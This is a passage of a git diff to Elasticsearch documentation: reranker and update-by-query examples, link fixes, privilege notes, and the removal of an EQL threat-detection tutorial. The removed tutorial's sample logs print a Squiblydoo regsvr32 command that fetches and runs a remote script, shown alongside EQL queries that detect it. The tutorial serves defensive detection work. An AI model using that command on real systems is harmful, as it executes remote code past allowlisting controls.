}, + "field": "text", + "inference_id": "my-cohere-rerank-model", + "inference_text": "Most famous landmark in Paris", + "rank_window_size": 100, + "min_score": 0.5 + } + } +} +``` + + +## Example: Semantic re-ranking with a Hugging Face model [text-similarity-reranker-retriever-example-eland] + +The following example uses the `cross-encoder/ms-marco-MiniLM-L-6-v2` model from Hugging Face to rerank search results based on semantic similarity. The model must be uploaded to {{es}} using [Eland](eland://reference/machine-learning.md#ml-nlp-pytorch). + +::::{tip} +Refer to [the Elastic NLP model reference](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-model-ref.md#ml-nlp-model-ref-text-similarity) for a list of third party text similarity models supported by {{es}}. + +:::: + + +Follow these steps to load the model and create a semantic re-ranker. + +1. Install Eland using `pip` + + ```sh + python -m pip install eland[pytorch] + ``` + +2. Upload the model to {{es}} using Eland. This example assumes you have an Elastic Cloud deployment and an API key. 
Refer to the [Eland documentation](eland://reference/machine-learning.md#ml-nlp-pytorch-auth) for more authentication options.
+
+    ```sh
+    eland_import_hub_model \
+      --cloud-id $CLOUD_ID \
+      --es-api-key $ES_API_KEY \
+      --hub-model-id cross-encoder/ms-marco-MiniLM-L-6-v2 \
+      --task-type text_similarity \
+      --clear-previous \
+      --start
+    ```
+
+3. Create an inference endpoint for the `rerank` task
+
+    ```console
+    PUT _inference/rerank/my-msmarco-minilm-model
+    {
+      "service": "elasticsearch",
+      "service_settings": {
+        "num_allocations": 1,
+        "num_threads": 1,
+        "model_id": "cross-encoder__ms-marco-minilm-l-6-v2"
+      }
+    }
+    ```
+
+4. Define a `text_similarity_reranker` retriever.
+
+    ```console
+    POST movies/_search
+    {
+      "retriever": {
+        "text_similarity_reranker": {
+          "retriever": {
+            "standard": {
+              "query": {
+                "match": {
+                  "genre": "drama"
+                }
+              }
+            }
+          },
+          "field": "plot",
+          "inference_id": "my-msmarco-minilm-model",
+          "inference_text": "films that explore psychological depths"
+        }
+      }
+    }
+    ```
+
+    This retriever uses a standard `match` query to search the `movies` index for films tagged with the genre "drama". It then re-ranks the results based on semantic similarity to the text in the `inference_text` parameter, using the model we uploaded to {{es}}.
diff --git a/docs/reference/elasticsearch/rest-apis/searching-with-query-rules.md b/docs/reference/elasticsearch/rest-apis/searching-with-query-rules.md
index 37a97495d5c97..e7bdc9d1a5439 100644
--- a/docs/reference/elasticsearch/rest-apis/searching-with-query-rules.md
+++ b/docs/reference/elasticsearch/rest-apis/searching-with-query-rules.md
@@ -18,13 +18,13 @@ $$$query-rules$$$
 * A referring site
 * etc.
 
-Query rules define a metadata key that will be used to match the metadata provided in the [rule retriever](/reference/elasticsearch/rest-apis/retrievers.md#rule-retriever) with the criteria specified in the rule.
+Query rules define a metadata key that will be used to match the metadata provided in the [rule retriever](/reference/elasticsearch/rest-apis/retrievers/rule-retriever.md) with the criteria specified in the rule.
 
 When a query rule matches the rule metadata according to its defined criteria, the query rule action is applied to the underlying `organic` query.
 
 For example, a query rule could be defined to match a user-entered query string of `pugs` and a country `us` and promote adoptable shelter dogs if the rule query met both criteria.
 
-Rules are defined using the [query rules API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-query_rules) and searched using the [rule retriever](/reference/elasticsearch/rest-apis/retrievers.md#rule-retriever) or the [rule query](/reference/query-languages/query-dsl/query-dsl-rule-query.md).
+Rules are defined using the [query rules API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-query_rules) and searched using the [rule retriever](/reference/elasticsearch/rest-apis/retrievers/rule-retriever.md) or the [rule query](/reference/query-languages/query-dsl/query-dsl-rule-query.md).
 
 ## Rule definition [query-rule-definition]
 
@@ -148,7 +148,7 @@ You can use the [Get query ruleset](https://www.elastic.co/docs/api/doc/elastics
 
 ## Search using query rules [rule-query-search]
 
-Once you have defined one or more query rulesets, you can search using these rulesets using the [rule retriever](/reference/elasticsearch/rest-apis/retrievers.md#rule-retriever) or the [rule query](/reference/query-languages/query-dsl/query-dsl-rule-query.md).
Retrievers are the recommended way to use rule queries, as they will work out of the box with other reranking retrievers such as [Reciprocal rank fusion](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md). +Once you have defined one or more query rulesets, you can search using these rulesets using the [rule retriever](/reference/elasticsearch/rest-apis/retrievers/rule-retriever.md) or the [rule query](/reference/query-languages/query-dsl/query-dsl-rule-query.md). Retrievers are the recommended way to use rule queries, as they will work out of the box with other reranking retrievers such as [Reciprocal rank fusion](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md). Rulesets are evaluated in order, so rules in the first ruleset you specify will be applied before any subsequent rulesets. @@ -186,7 +186,7 @@ It’s possible to have multiple rules in a ruleset match a single [rule query]( * If multiple documents are specified in a single rule, in the order they are specified * If a document is matched by both a `pinned` rule and an `exclude` rule, the `exclude` rule will take precedence -You can specify reranking retrievers such as [rrf](/reference/elasticsearch/rest-apis/retrievers.md#rrf-retriever) or [text_similarity_reranker](/reference/elasticsearch/rest-apis/retrievers.md#text-similarity-reranker-retriever) in the rule query to apply query rules on already-reranked results. Here is an example: +You can specify reranking retrievers such as [rrf](/reference/elasticsearch/rest-apis/retrievers/rrf-retriever.md) or [text_similarity_reranker](/reference/elasticsearch/rest-apis/retrievers/text-similarity-reranker-retriever.md) in the rule query to apply query rules on already-reranked results. Here is an example: ```console GET my-index-000001/_search diff --git a/docs/reference/elasticsearch/rest-apis/update-by-query-api.md b/docs/reference/elasticsearch/rest-apis/update-by-query-api.md new file mode 100644 index 0000000000000..00bc1bc8b0221 --- /dev/null +++ b/docs/reference/elasticsearch/rest-apis/update-by-query-api.md @@ -0,0 +1,425 @@ +--- +navigation_title: "Update By Query API" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/8.18/docs-update.html#update-api-example +applies_to: + stack: all +--- + +# Update by query API examples + +This page provides examples of how to use the [Update by query API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-update-by-query). + +You can learn how to: + +- [Run basic update-by-query operations](#run-basic-updates) +- [Modify documents using scripts or ingest pipelines](#update-the-document) +- [Throttle update operations](#change-throttling-for-a-request) +- [Parallelize updates using manual slicing](#slice-manually) +- [Automate slicing for better performance](#use-automatic-slicing) +- [Apply mapping changes to existing documents](#pick-up-a-new-property) + +## Run basic updates + +The simplest usage of `_update_by_query` just performs an update on every document in the data stream or index without changing the source. This is useful to [pick up a new property](#pick-up-a-new-property) or some other online mapping change. + +To update selected documents, specify a query in the request body: + +```console +POST my-index-000001/_update_by_query?conflicts=proceed +{ + "query": { <1> + "term": { + "user.id": "kimchy" + } + } +} +``` +% TEST[setup:my_index] + +1. 
The query must be passed as a value to the `query` key, in the same way as the [Search API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search). You can also use the `q` parameter in the same way as the search API.
+
+### Target multiple indices
+
+Update documents in multiple data streams or indices:
+
+```console
+POST my-index-000001,my-index-000002/_update_by_query
+```
+% TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/]
+
+### Filter by routing
+
+Limit the update by query operation to shards that a particular routing value is routed to:
+
+```console
+POST my-index-000001/_update_by_query?routing=1
+```
+% TEST[setup:my_index]
+
+### Change batch size
+
+By default, update by query uses scroll batches of 1000. You can change the batch size with the `scroll_size` parameter:
+
+```console
+POST my-index-000001/_update_by_query?scroll_size=100
+```
+% TEST[setup:my_index]
+
+## Update the document
+
+Update a document using a unique attribute:
+
+```console
+POST my-index-000001/_update_by_query
+{
+  "query": {
+    "term": {
+      "user.id": "kimchy"
+    }
+  },
+  "max_docs": 1
+}
+```
+% TEST[setup:my_index]
+
+### Update the document source
+
+Update by query supports scripts to update the document source. For example, the following request increments the `count` field for all documents with a `user.id` of `kimchy` in `my-index-000001`:
+
+
+
+```console
+POST my-index-000001/_update_by_query
+{
+  "script": {
+    "source": "ctx._source.count++",
+    "lang": "painless"
+  },
+  "query": {
+    "term": {
+      "user.id": "kimchy"
+    }
+  }
+}
+```
+% TEST[continued]
+
+Note that `conflicts=proceed` is not specified in this example. In this case, a version conflict should halt the process so you can handle the failure.
+
+As with the [Update API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-update), you can set `ctx.op` to change the operation that is performed:
+
+`noop`
+: Set `ctx.op = "noop"` if your script decides that it doesn't have to make any changes.
+The update by query operation skips updating the document and increments the `noop` counter.
+
+`delete`
+: Set `ctx.op = "delete"` if your script decides that the document should be deleted.
+The update by query operation deletes the document and increments the `deleted` counter.
+
+Update by query only supports `index`, `noop`, and `delete`. Setting `ctx.op` to anything else is an error. Setting any other field in `ctx` is an error.
+This API only enables you to modify the source of matching documents; you cannot move them.
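+
+As a minimal sketch of these `ctx.op` values in action (the `count` field and its threshold are illustrative), a single script can delete some matching documents and skip the rest:
+
+```console
+POST my-index-000001/_update_by_query?conflicts=proceed
+{
+  "script": {
+    "source": """
+      if (ctx._source.count > 100) {
+        ctx.op = 'delete'; // increments the `deleted` counter
+      } else {
+        ctx.op = 'noop';   // increments the `noop` counter
+      }
+    """,
+    "lang": "painless"
+  },
+  "query": {
+    "term": {
+      "user.id": "kimchy"
+    }
+  }
+}
+```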
+
+### Update documents using an ingest pipeline
+
+Update by query can use the [ingest pipelines](docs-content://manage-data/ingest/transform-enrich/ingest-pipelines.md) feature by specifying a `pipeline`:
+
+```console
+PUT _ingest/pipeline/set-foo
+{
+  "description" : "sets foo",
+  "processors" : [ {
+    "set" : {
+      "field": "foo",
+      "value": "bar"
+    }
+  } ]
+}
+POST my-index-000001/_update_by_query?pipeline=set-foo
+```
+% TEST[setup:my_index]
+
+### Get the status of update by query operations
+
+You can fetch the status of all running update by query requests with the [Task API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-tasks):
+
+```console
+GET _tasks?detailed=true&actions=*byquery
+```
+% TEST[skip:No tasks to retrieve]
+
+The response looks like:
+
+```console-result
+{
+  "nodes" : {
+    "r1A2WoRbTwKZ516z6NEs5A" : {
+      "name" : "r1A2WoR",
+      "transport_address" : "127.0.0.1:9300",
+      "host" : "127.0.0.1",
+      "ip" : "127.0.0.1:9300",
+      "attributes" : {
+        "testattr" : "test",
+        "portsfile" : "true"
+      },
+      "tasks" : {
+        "r1A2WoRbTwKZ516z6NEs5A:36619" : {
+          "node" : "r1A2WoRbTwKZ516z6NEs5A",
+          "id" : 36619,
+          "type" : "transport",
+          "action" : "indices:data/write/update/byquery",
+          "status" : {    <1>
+            "total" : 6154,
+            "updated" : 3500,
+            "created" : 0,
+            "deleted" : 0,
+            "batches" : 4,
+            "version_conflicts" : 0,
+            "noops" : 0,
+            "retries": {
+              "bulk": 0,
+              "search": 0
+            },
+            "throttled_millis": 0
+          },
+          "description" : ""
+        }
+      }
+    }
+  }
+}
+```
+
+1. This object contains the actual status. It is just like the response JSON with the important addition of the `total` field. `total` is the total number of operations that the update by query operation expects to perform. You can estimate the progress by adding the `updated`, `created`, and `deleted` fields. The request will finish when their sum is equal to the `total` field.
+
+With the task ID you can look up the task directly. The following example retrieves information about task `r1A2WoRbTwKZ516z6NEs5A:36619`:
+
+```console
+GET /_tasks/r1A2WoRbTwKZ516z6NEs5A:36619
+```
+% TEST[catch:missing]
+
+The advantage of this API is that it integrates with `wait_for_completion=false` to transparently return the status of completed tasks. If the task is completed and `wait_for_completion=false` was set on it, then it'll come back with a `results` or an `error` field. The cost of this feature is the document that `wait_for_completion=false` creates at `.tasks/task/${taskId}`. It is up to you to delete that document.
+
+### Cancel an update by query operation
+
+Any update by query can be cancelled using the [Cancel API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-tasks):
+
+```console
+POST _tasks/r1A2WoRbTwKZ516z6NEs5A:36619/_cancel
+```
+
+The task ID can be found using the [Task API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-tasks).
+
+Cancellation should happen quickly but might take a few seconds. The task status API above will continue to list the update by query task until this task checks that it has been cancelled and terminates itself.
+
+## Change throttling for a request
+
+The value of `requests_per_second` can be changed on a running update by query using the `_rethrottle` API:
+
+```console
+POST _update_by_query/r1A2WoRbTwKZ516z6NEs5A:36619/_rethrottle?requests_per_second=-1
+```
+
+The task ID can be found using the [Task API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-tasks).
+
+Just like when setting it on the `_update_by_query` API, `requests_per_second` can be either `-1` to disable throttling or any decimal number like `1.7` or `12` to throttle to that level. Rethrottling that speeds up the query takes effect immediately, but rethrottling that slows down the query will take effect after completing the current batch. This prevents scroll timeouts.
+
+## Slice manually
+
+Slice an update by query manually by providing a slice id and total number of slices to each request:
+
+```console
+POST my-index-000001/_update_by_query
+{
+  "slice": {
+    "id": 0,
+    "max": 2
+  },
+  "script": {
+    "source": "ctx._source['extra'] = 'test'"
+  }
+}
+POST my-index-000001/_update_by_query
+{
+  "slice": {
+    "id": 1,
+    "max": 2
+  },
+  "script": {
+    "source": "ctx._source['extra'] = 'test'"
+  }
+}
+```
+% TEST[setup:my_index_big]
+
+Which you can verify works with:
+
+```console
+GET _refresh
+POST my-index-000001/_search?size=0&q=extra:test&filter_path=hits.total
+```
+% TEST[continued]
+
+Which results in a sensible `total` like this one:
+
+```console-result
+{
+  "hits": {
+    "total": {
+      "value": 120,
+      "relation": "eq"
+    }
+  }
+}
+```
+
+## Use automatic slicing
+
+You can also let update by query automatically parallelize using [slice-scroll](paginate-search-results.md#slice-scroll) to slice on `_id`. Use `slices` to specify the number of slices to use:
+
+```console
+POST my-index-000001/_update_by_query?refresh&slices=5
+{
+  "script": {
+    "source": "ctx._source['extra'] = 'test'"
+  }
+}
+```
+% TEST[setup:my_index_big]
+
+Which you can also verify works with:
+
+```console
+POST my-index-000001/_search?size=0&q=extra:test&filter_path=hits.total
+```
+% TEST[continued]
+
+Which results in a sensible `total` like this one:
+
+```console-result
+{
+  "hits": {
+    "total": {
+      "value": 120,
+      "relation": "eq"
+    }
+  }
+}
+```
+
+Setting `slices` to `auto` will let Elasticsearch choose the number of slices to use. This setting will use one slice per shard, up to a certain limit. If there are multiple source data streams or indices, it will choose the number of slices based on the index or backing index with the smallest number of shards.
+
+Adding `slices` to `_update_by_query` just automates the manual process used in the section above, creating sub-requests, which means it has some quirks:
+
+- You can see these requests in the [Tasks APIs](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-tasks). These sub-requests are "child" tasks of the task for the request with `slices`.
+- Fetching the status of the task for the request with `slices` only contains the status of completed slices.
+- These sub-requests are individually addressable for things like cancellation and rethrottling.
+- Rethrottling the request with `slices` will rethrottle the unfinished sub-requests proportionally.
+- Canceling the request with `slices` will cancel each sub-request.
+- Due to the nature of `slices`, each sub-request won't get a perfectly even portion of the documents. All documents will be addressed, but some slices may be larger than others. Expect larger slices to have a more even distribution.
+- Parameters like `requests_per_second` and `max_docs` on a request with `slices` are distributed proportionally to each sub-request. Combine that with the point above about distribution being uneven and you should conclude that using `max_docs` with `slices` might not result in exactly `max_docs` documents being updated.
+- Each sub-request gets a slightly different snapshot of the source data stream or index though these are all taken at approximately the same time. + +## Pick up a new property + +Say you created an index without dynamic mapping, filled it with data, and then added a mapping value to pick up more fields from the data: + +```console +PUT test +{ + "mappings": { + "dynamic": false, <1> + "properties": { + "text": {"type": "text"} + } + } +} + +POST test/_doc?refresh +{ + "text": "words words", + "flag": "bar" +} +POST test/_doc?refresh +{ + "text": "words words", + "flag": "foo" +} +PUT test/_mapping <2> +{ + "properties": { + "text": {"type": "text"}, + "flag": {"type": "text", "analyzer": "keyword"} + } +} +``` + +1. This means that new fields won't be indexed, just stored in `_source`. + +2. This updates the mapping to add the new `flag` field. To pick up the new field you have to reindex all documents with it. + +Searching for the data won't find anything: + +```console +POST test/_search?filter_path=hits.total +{ + "query": { + "match": { + "flag": "foo" + } + } +} +``` +% TEST[continued] + +```console-result +{ + "hits" : { + "total": { + "value": 0, + "relation": "eq" + } + } +} +``` + +But you can issue an `_update_by_query` request to pick up the new mapping: + +```console +POST test/_update_by_query?refresh&conflicts=proceed +POST test/_search?filter_path=hits.total +{ + "query": { + "match": { + "flag": "foo" + } + } +} +``` +% TEST[continued] + +```console-result +{ + "hits" : { + "total": { + "value": 1, + "relation": "eq" + } + } +} +``` + +You can do the exact same thing when adding a field to a multifield. + + diff --git a/docs/reference/elasticsearch/security-privileges.md b/docs/reference/elasticsearch/security-privileges.md index 6e0fd02b2c3b8..ae3438cec16c6 100644 --- a/docs/reference/elasticsearch/security-privileges.md +++ b/docs/reference/elasticsearch/security-privileges.md @@ -286,22 +286,20 @@ This section lists the privileges that you can assign to a role. `create` : Privilege to index documents. - :::{admonition} Deprecated in 8.0 - Also grants the permission to update the index mapping (but not the data streams mapping), using the [updating mapping API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping) or by relying on [dynamic field mapping](docs-content://manage-data/data-store/mapping/dynamic-mapping.md). In a future major release, this privilege will not grant any mapping update permissions. - ::: - ::::{note} This privilege does not restrict the index operation to the creation of documents but instead restricts API use to the index API. The index API allows a user to overwrite a previously indexed document. See the `create_doc` privilege for an alternative. :::: + :::{important} + Starting from 8.0, this privilege no longer grants the permission to update index mappings. + In earlier versions, it implicitly permitted index mapping updates (excluding data stream mappings) via the [updating mapping API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping) or through [dynamic field mapping](docs-content://manage-data/data-store/mapping/dynamic-mapping.md). + Mapping update capabilities will be fully removed in a future major release. + ::: + `create_doc` : Privilege to index documents. It does not grant the permission to update or overwrite existing documents. 
- :::{admonition} Deprecated in 8.0 - Also grants the permission to update the index mapping (but not the data streams mapping), using the [updating mapping API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping) or by relying on [dynamic field mapping](docs-content://manage-data/data-store/mapping/dynamic-mapping.md). In a future major release, this privilege will not grant any mapping update permissions. - ::: - ::::{note} This privilege relies on the `op_type` of indexing requests ([Index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-create) and [Bulk](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-bulk)). When ingesting documents as a user who has the `create_doc` privilege (and no higher privilege such as `index` or `write`), you must ensure that *op_type* is set to *create* through one of the following: @@ -311,6 +309,12 @@ This section lists the privileges that you can assign to a role. :::: + :::{important} + Starting from 8.0, this privilege no longer grants the permission to update index mappings. + In earlier versions, it implicitly permitted index mapping updates (excluding data stream mappings) via the [updating mapping API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping) or through [dynamic field mapping](docs-content://manage-data/data-store/mapping/dynamic-mapping.md). + Mapping update capabilities will be fully removed in a future major release. + ::: + `create_index` : Privilege to create an index or data stream. A create index request may contain aliases to be added to the index once created. In that case the request requires the `manage` privilege as well, on both the index and the aliases names. @@ -340,8 +344,10 @@ This section lists the privileges that you can assign to a role. `index` : Privilege to index and update documents. - :::{admonition} Deprecated in 8.0 - Also grants the permission to update the index mapping (but not the data streams mapping), using the [updating mapping API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping) or by relying on [dynamic field mapping](docs-content://manage-data/data-store/mapping/dynamic-mapping.md). In a future major release, this privilege will not grant any mapping update permissions. + :::{important} + Starting from 8.0, this privilege no longer grants the permission to update index mappings. + In earlier versions, it implicitly permitted index mapping updates (excluding data stream mappings) via the [updating mapping API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping) or through [dynamic field mapping](docs-content://manage-data/data-store/mapping/dynamic-mapping.md). + Mapping update capabilities will be fully removed in a future major release. ::: `maintenance` @@ -389,8 +395,10 @@ This section lists the privileges that you can assign to a role. `write` : Privilege to perform all write operations to documents, which includes the permission to index, update, and delete documents as well as performing bulk operations, while also allowing to dynamically update the index mapping. - :::{admonition} Deprecated in 8.0 - It also grants the permission to update the index mapping (but not the data streams mapping), using the [updating mapping API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping). This will be retracted in a future major release. 
+ :::{important} + Starting from 8.0, this privilege no longer grants the permission to update index mappings. + In earlier versions, it implicitly permitted index mapping updates (excluding data stream mappings) via the [updating mapping API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping) or through [dynamic field mapping](docs-content://manage-data/data-store/mapping/dynamic-mapping.md). + Mapping update capabilities will be fully removed in a future major release. ::: ## Run as privilege [_run_as_privilege] diff --git a/docs/reference/elasticsearch/toc.yml b/docs/reference/elasticsearch/toc.yml index 16bffed9e0699..01774d0a6bc93 100644 --- a/docs/reference/elasticsearch/toc.yml +++ b/docs/reference/elasticsearch/toc.yml @@ -96,6 +96,16 @@ toc: - file: rest-apis/retrieve-selected-fields.md - file: rest-apis/retrieve-stored-fields.md - file: rest-apis/retrievers.md + children: + - file: rest-apis/retrievers/knn-retriever.md + - file: rest-apis/retrievers/linear-retriever.md + - file: rest-apis/retrievers/pinned-retriever.md + - file: rest-apis/retrievers/rescorer-retriever.md + - file: rest-apis/retrievers/rrf-retriever.md + - file: rest-apis/retrievers/rule-retriever.md + - file: rest-apis/retrievers/standard-retriever.md + - file: rest-apis/retrievers/text-similarity-reranker-retriever.md + - file: rest-apis/retrievers/retrievers-examples.md - file: rest-apis/search-multiple-data-streams-indices.md - file: rest-apis/search-profile.md - file: rest-apis/search-rank-eval.md @@ -105,6 +115,7 @@ toc: - file: rest-apis/searching-with-query-rules.md - file: rest-apis/shard-request-cache.md - file: rest-apis/term-vectors-examples.md + - file: rest-apis/update-by-query-api.md - file: rest-apis/update-cc-api-key-examples.md - file: rest-apis/vector-tile-search.md - file: mapping-reference/index.md diff --git a/docs/reference/query-languages/eql/eql-ex-threat-detection.md b/docs/reference/query-languages/eql/eql-ex-threat-detection.md deleted file mode 100644 index 92df0aef64667..0000000000000 --- a/docs/reference/query-languages/eql/eql-ex-threat-detection.md +++ /dev/null @@ -1,332 +0,0 @@ ---- -mapped_pages: - - https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-ex-threat-detection.html ---- - -# Example: Detect threats with EQL [eql-ex-threat-detection] - -This example tutorial shows how you can use EQL to detect security threats and other suspicious behavior. In the scenario, you’re tasked with detecting [regsvr32 misuse](https://attack.mitre.org/techniques/T1218/010/) in Windows event logs. - -`regsvr32.exe` is a built-in command-line utility used to register `.dll` libraries in Windows. As a native tool, `regsvr32.exe` has a trusted status, letting it bypass most allowlist software and script blockers. Attackers with access to a user’s command line can use `regsvr32.exe` to run malicious scripts via `.dll` libraries, even on machines that otherwise disallow such scripts. - -One common variant of regsvr32 misuse is a [Squiblydoo attack](https://attack.mitre.org/techniques/T1218/010/). In a Squiblydoo attack, a `regsvr32.exe` command uses the `scrobj.dll` library to register and run a remote script. These commands often look like this: - -```sh -"regsvr32.exe /s /u /i: scrobj.dll" -``` - - -## Setup [eql-ex-threat-detection-setup] - -This tutorial uses a test dataset from [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team) that includes events imitating a Squiblydoo attack. 
The data has been mapped to [Elastic Common Schema (ECS)](ecs://reference/index.md) fields.
-
-To get started:
-
-1. Create an [index template](docs-content://manage-data/data-store/templates.md) with [data stream enabled](docs-content://manage-data/data-store/data-streams/set-up-data-stream.md#create-index-template):
-
-    ```console
-    PUT /_index_template/my-data-stream-template
-    {
-      "index_patterns": [ "my-data-stream*" ],
-      "data_stream": { },
-      "priority": 500
-    }
-    ```
-
-2. Download [`normalized-T1117-AtomicRed-regsvr32.json`](https://raw.githubusercontent.com/elastic/elasticsearch/master/docs/src/yamlRestTest/resources/normalized-T1117-AtomicRed-regsvr32.json).
-3. Use the [bulk API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-bulk) to index the data to a matching stream:
-
-    ```sh
-    curl -H "Content-Type: application/json" -XPOST "localhost:9200/my-data-stream/_bulk?pretty&refresh" --data-binary "@normalized-T1117-AtomicRed-regsvr32.json"
-    ```
-
-4. Use the [cat indices API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-indices) to verify the data was indexed:
-
-    ```console
-    GET /_cat/indices/my-data-stream?v=true&h=health,status,index,docs.count
-    ```
-
-    The response should show a `docs.count` of `150`.
-
-    ```txt
-    health status index                                docs.count
-    yellow open   .ds-my-data-stream-2099.12.07-000001        150
-    ```
-
-
-
-## Get a count of regsvr32 events [eql-ex-get-a-count-of-regsvr32-events]
-
-First, get a count of events associated with a `regsvr32.exe` process:
-
-```console
-GET /my-data-stream/_eql/search?filter_path=-hits.events <1>
-{
-  "query": """
-    any where process.name == "regsvr32.exe" <2>
-  """,
-  "size": 200 <3>
-}
-```
-
-1. `?filter_path=-hits.events` excludes the `hits.events` property from the response. This search is only intended to get an event count, not a list of matching events.
-2. Matches any event with a `process.name` of `regsvr32.exe`.
-3. Returns up to 200 hits for matching events.
-
-
-The response returns 143 related events.
-
-```console-result
-{
-  "is_partial": false,
-  "is_running": false,
-  "took": 60,
-  "timed_out": false,
-  "hits": {
-    "total": {
-      "value": 143,
-      "relation": "eq"
-    }
-  }
-}
-```
-
-
-## Check for command line artifacts [eql-ex-check-for-command-line-artifacts]
-
-`regsvr32.exe` processes were associated with 143 events. But how was `regsvr32.exe` first called? And who called it? `regsvr32.exe` is a command-line utility. Narrow your results to processes where the command line was used:
-
-```console
-GET /my-data-stream/_eql/search
-{
-  "query": """
-    process where process.name == "regsvr32.exe" and process.command_line.keyword != null
-  """
-}
-```
-
-The query matches one event with an `event.type` of `creation`, indicating the start of a `regsvr32.exe` process. Based on the event’s `process.command_line` value, `regsvr32.exe` used `scrobj.dll` to register a script, `RegSvr32.sct`. This fits the behavior of a Squiblydoo attack.
-
-```console-result
-{
-  ...
- "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "events": [ - { - "_index": ".ds-my-data-stream-2099.12.07-000001", - "_id": "gl5MJXMBMk1dGnErnBW8", - "_source": { - "process": { - "parent": { - "name": "cmd.exe", - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", - "executable": "C:\\Windows\\System32\\cmd.exe" - }, - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll", - "executable": "C:\\Windows\\System32\\regsvr32.exe", - "ppid": 2652 - }, - "logon_id": 217055, - "@timestamp": 131883573237130000, - "event": { - "category": "process", - "type": "creation" - }, - "user": { - "full_name": "bob", - "domain": "ART-DESKTOP", - "id": "ART-DESKTOP\\bob" - } - } - } - ] - } -} -``` - - -## Check for malicious script loads [eql-ex-check-for-malicious-script-loads] - -Check if `regsvr32.exe` later loads the `scrobj.dll` library: - -```console -GET /my-data-stream/_eql/search -{ - "query": """ - library where process.name == "regsvr32.exe" and dll.name == "scrobj.dll" - """ -} -``` - -The query matches an event, confirming `scrobj.dll` was loaded. - -```console-result -{ - ... - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "events": [ - { - "_index": ".ds-my-data-stream-2099.12.07-000001", - "_id": "ol5MJXMBMk1dGnErnBW8", - "_source": { - "process": { - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - }, - "@timestamp": 131883573237450016, - "dll": { - "path": "C:\\Windows\\System32\\scrobj.dll", - "name": "scrobj.dll" - }, - "event": { - "category": "library" - } - } - } - ] - } -} -``` - - -## Determine the likelihood of success [eql-ex-detemine-likelihood-of-success] - -In many cases, attackers use malicious scripts to connect to remote servers or download other files. Use an [EQL sequence query](/reference/query-languages/eql/eql-syntax.md#eql-sequences) to check for the following series of events: - -1. A `regsvr32.exe` process -2. A load of the `scrobj.dll` library by the same process -3. Any network event by the same process - -Based on the command line value seen in the previous response, you can expect to find a match. However, this query isn’t designed for that specific command. Instead, it looks for a pattern of suspicious behavior that’s generic enough to detect similar threats. - -```console -GET /my-data-stream/_eql/search -{ - "query": """ - sequence by process.pid - [process where process.name == "regsvr32.exe"] - [library where dll.name == "scrobj.dll"] - [network where true] - """ -} -``` - -The query matches a sequence, indicating the attack likely succeeded. - -```console-result -{ - ... 
- "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "sequences": [ - { - "join_keys": [ - 2012 - ], - "events": [ - { - "_index": ".ds-my-data-stream-2099.12.07-000001", - "_id": "gl5MJXMBMk1dGnErnBW8", - "_source": { - "process": { - "parent": { - "name": "cmd.exe", - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", - "executable": "C:\\Windows\\System32\\cmd.exe" - }, - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll", - "executable": "C:\\Windows\\System32\\regsvr32.exe", - "ppid": 2652 - }, - "logon_id": 217055, - "@timestamp": 131883573237130000, - "event": { - "category": "process", - "type": "creation" - }, - "user": { - "full_name": "bob", - "domain": "ART-DESKTOP", - "id": "ART-DESKTOP\\bob" - } - } - }, - { - "_index": ".ds-my-data-stream-2099.12.07-000001", - "_id": "ol5MJXMBMk1dGnErnBW8", - "_source": { - "process": { - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - }, - "@timestamp": 131883573237450016, - "dll": { - "path": "C:\\Windows\\System32\\scrobj.dll", - "name": "scrobj.dll" - }, - "event": { - "category": "library" - } - } - }, - { - "_index": ".ds-my-data-stream-2099.12.07-000001", - "_id": "EF5MJXMBMk1dGnErnBa9", - "_source": { - "process": { - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": 